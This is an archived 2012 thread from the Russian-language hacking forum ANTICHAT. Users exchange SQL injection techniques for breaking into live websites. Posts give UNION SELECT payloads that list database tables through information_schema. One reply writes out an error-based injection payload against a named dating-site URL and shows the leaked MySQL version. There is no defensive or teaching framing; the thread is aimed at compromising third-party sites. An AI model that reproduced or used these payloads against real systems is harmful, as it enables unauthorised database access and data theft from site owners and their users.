ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

08.02.2012, 23:32
|
|
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме: 4819
Репутация:
0
|
|
16 символов навело на мысль что это sql хеш , но че он в таком странном виде?
Подскажите кто нибудь хоть что-то плз .
|
|
|

09.02.2012, 00:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 23576
Репутация:
-1
|
|
Сообщение от sl1k
sl1k said:
16 символов навело на мысль что это sql хеш , но че он в таком странном виде?
Подскажите кто нибудь хоть что-то плз .
а у тебя случяйно не blind injection??
|
|
|
|

09.02.2012, 00:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 23576
Репутация:
-1
|
|
Сообщение от ivan151
ivan151 said:
есть ли запрос чтобы не юзать постоянно лимит(я о такой конструкции union+select+1,2,3,4,table_name+from+information_s chema.tables+limit+1,1) а что-бы вывести все таблицы с одного поля или нескольких,просто есть всего 2 поля
есть - union+select+1,2,3,4,group_concat(table_name)+from +information_schema.tables+where+table_schema='и я database()'
но вывести можго только 1024 символа
|
|
|
|

09.02.2012, 00:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 149611
Репутация:
81
|
|
В общем так, есть сайт, и при site.com/lol.php?id=1' выдаётся ошибка mysql_fetch_object(), и кавычка экранируется как \' ...
а при /**/order/**/by/**/9999-- и т.п еррора нету, думал что запрос обрамлён в кавычки, но видимо не так, так как другим раскрутить удалось, собственно, какие идеи?
P.S Error-based тоже юзал..
|
|
|
|

09.02.2012, 00:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 149611
Репутация:
81
|
|
Сообщение от pirat0
pirat0 said:
есть - union+select+1,2,3,4,group_concat(table_name)+from +information_schema.tables+where+table_schema='и я database()'
но вывести можго только 1024 символа
юзай mid()
а вообще LIMIT бы не мешало сначала
|
|
|
|

09.02.2012, 01:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 9412
Репутация:
0
|
|
Есть идеи как нибудь раскрутить это?
Сообщение от None
http://www.datingtop.net/index.php?id=10'
|
|
|
|

09.02.2012, 01:57
|
|
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме: 4819
Репутация:
0
|
|
Сообщение от pirat0
pirat0 said:
а у тебя случяйно не blind injection??
нет через обычный union вывожу.
cв§±uКч"‡Bњn
dс\ ґЃJК.я-йј
ЛXЫ l[Ж RЂNяїџъ
ХzWt9:fЗРЭh.G
JyM·B>ґ
|
|
|

09.02.2012, 02:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 23576
Репутация:
-1
|
|
Сообщение от TYPUCT
TYPUCT said:
Есть идеи как нибудь раскрутить это?
http://www.datingtop.net/index.php?id=10+and(select+count(*)+from+informati on_schema.tables+group+by(concat(version(),0x00,fl oor(rand(0)*2))))--+
Код:
Code:
Duplicate entry '5.0.92-community' for key 1
|
|
|
|

09.02.2012, 02:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 23576
Репутация:
-1
|
|
[QUOTE="sl1k"]
sl1k said:
нет через обычный union вывожу.
cв§±uКч"‡Bњn
dс\ ґЃJК.я-йј
ЛXЫ l[Ж RЂNяїџъ
ХzWt9:fЗРЭh.G
JyM·B>ґґ
|
|
|
|

09.02.2012, 02:33
|
|
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме: 4819
Репутация:
0
|
|
Сообщение от pirat0
pirat0 said:
ты руками выводиш или прогой??
и руками и прогой
|
|
|
|
 |
|
|
Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
|
|
|
|